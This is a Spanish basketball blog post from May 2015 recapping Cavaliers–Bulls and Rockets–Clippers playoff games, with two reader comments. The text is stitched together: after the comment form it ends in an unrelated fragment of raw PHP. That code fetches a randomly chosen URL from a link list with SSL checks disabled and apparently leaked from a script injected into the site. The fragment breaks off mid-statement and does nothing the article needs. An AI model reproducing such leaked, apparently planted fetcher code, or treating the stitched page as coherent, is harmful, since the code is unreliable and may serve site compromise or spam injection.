La Crónica: MVPs

13 de May de 2015 por txusma

¡Vaya dos actuaciones nos regalaron anoche Lebron James y James Harden! Ambas fueron claves para que sus equipos se llevaran la victoria, de manera apurada los Cavaliers y mucho más fácilmente los Rockets. Los próximos partidos los jugaran fuera de casa pero con diferente situación: Cleveland aún tiene el colchón del séptimo en casa en caso de derrota. Para los Rockets será otro “Must Win”, el segundo de los 3 que tendrían que superar para llegar a la final de conferencia.

Chicago Bulls 101 – Cleveland Cavaliers 106

38 puntos, 12 rebotes, 6 asistencias, 3 robos, 3 tapones y… atención, 0 pérdidas. Una actuación histórica de Lebron James que fue necesaria hasta en el más mínimo detalle para que los Cavaliers se llevaran la victoria que les vuelve a poner por delante en la eliminatoria. Fue otro partido intensísimo que no se resolvió hasta los segundos finales. A pesar de no contar con Pau Gasol, los Bulls salieron fuertes de la mano de Derrick Rose y Tab Gibson y llegaron a acumular 10 puntos de ventaja en los primeros minutos. Sin embargo, 7 puntos de Iman Shumpert y un sorprendentemente recuperado Kyrie Irving igualaron de nuevo el marcador. En el segundo cuarto, Lebron tomó el mando y los locales se fueron con ventaja al descanso. A partir de aquí los Bulls se dedicaron a hacer la goma. Llegaron a empatar el partido en el tercer cuarto a pesar de la pájara de Rose (1 de 12 en TC en la 2ª parte) pero tuvo que meter Nikola Mirotic un triple desde su campo sobre la bocina del final del tercer cuarto para evitar que los locales entraran con 12 puntos de ventaja en el cuarto decisivo. Al inicio del mismo, Gibson fue expulsado por soltar una patada a Matthew Dellavedova lo que pareció animar a los Cavs que se fueron hasta los 17 puntos de ventaja. Lejos de abandonar, los Bulls reaccionaron de la mano de un tremendo Jimmy Butler y tuvieron incluso un par de oportunidades de empatar o ponerse por delante en el último minuto. La pelota no quiso entrar y un rebote ofensivo de Iman Shumpert tras fallo de Lebron a falta de 22 segundos enterró definitivamente las posibilidades visitantes. 

MVP: Lebron James (38 puntos, 12 rebotes, 6 asistencias, 3 robos, 3 tapones, 0 pérdidas)

LA Clippers 103 – Houston Rockets 124

Ayer sobre la pista del Toyota Center rápidamente quedó claro qué equipo era el que estaba contra las cuerdas. Los Clippers no saltaron a la cancha con la misma intensidad que en los partidos anteriores y unos Rockets comprometidos con la causa se lo hicieran pagar ya en la primera parte. Dwight Howard quiso borrar de la memoria su lamentable 4º partido y ya en el primer cuarto había anotado 9 puntos y cogido 5 rebotes (acabó con 20 y 15). Junto a Trevor Ariza fueron los que tiraron del carro en esos minutos. En el segundo minuto empezó el espectáculo James Harden. A pesar de estar aquejado por la fiebre el fenomenal escolta volvió a dirigir el juego de los suyos en muchas ocasiones y a buscar las penetraciones, algo de lo que fue incapaz en el anterior partido. Un parcial de 15-2 para los locales les otorgó 15 puntos de ventaja a la media parte. En el tercer cuarto las diferencias incluso aumentaron y cuando los Clippers se pusieron a 12 al principio del último cuarto en un último intento desesperado por meterse en el partido 5 puntos de Josh Smith, que fue titular en detrimento de Terrence Jones, volvieron a poner tierra de por medio esta vez de manera definitiva. Los Rockets han hecho lo que tenían que hacer pero todos sabemos qué partido tenían en mente los Clippers desde que ganaron el 4º. En dos días, podemos tener finiquitada la serie.

MVP: James Harden (26 puntos, 11 rebotes, 10 asistencias)

Comenta

2 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    Destacar también al capullo de Dunleavy haciendo sufrir a los Cavs en el último cuarto con sus triples,más allá de lo deseado,sobre todo a partir de la autoexpulsión de Taj Gibson.Está todo dicho en la crónica,brillante LeBron.Se presenta un 6º apasionante.

    ¿Alguien apuesta a que Houston prolongue la serie hasta el 7º?Porque todo el mundo da por muerta la semi,yo entre ellos.0,0 opciones les doy a los Rockets.

      Citar

  2. Nacho dice:
    #2

    Joder!!! Tengo la sensación de estar perdiéndome los mejores PO en años. Gracias a vosotros los llevo en sangre, creo que llego al comienzo de las finales de conferencia, espero que no me defrauden!!!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>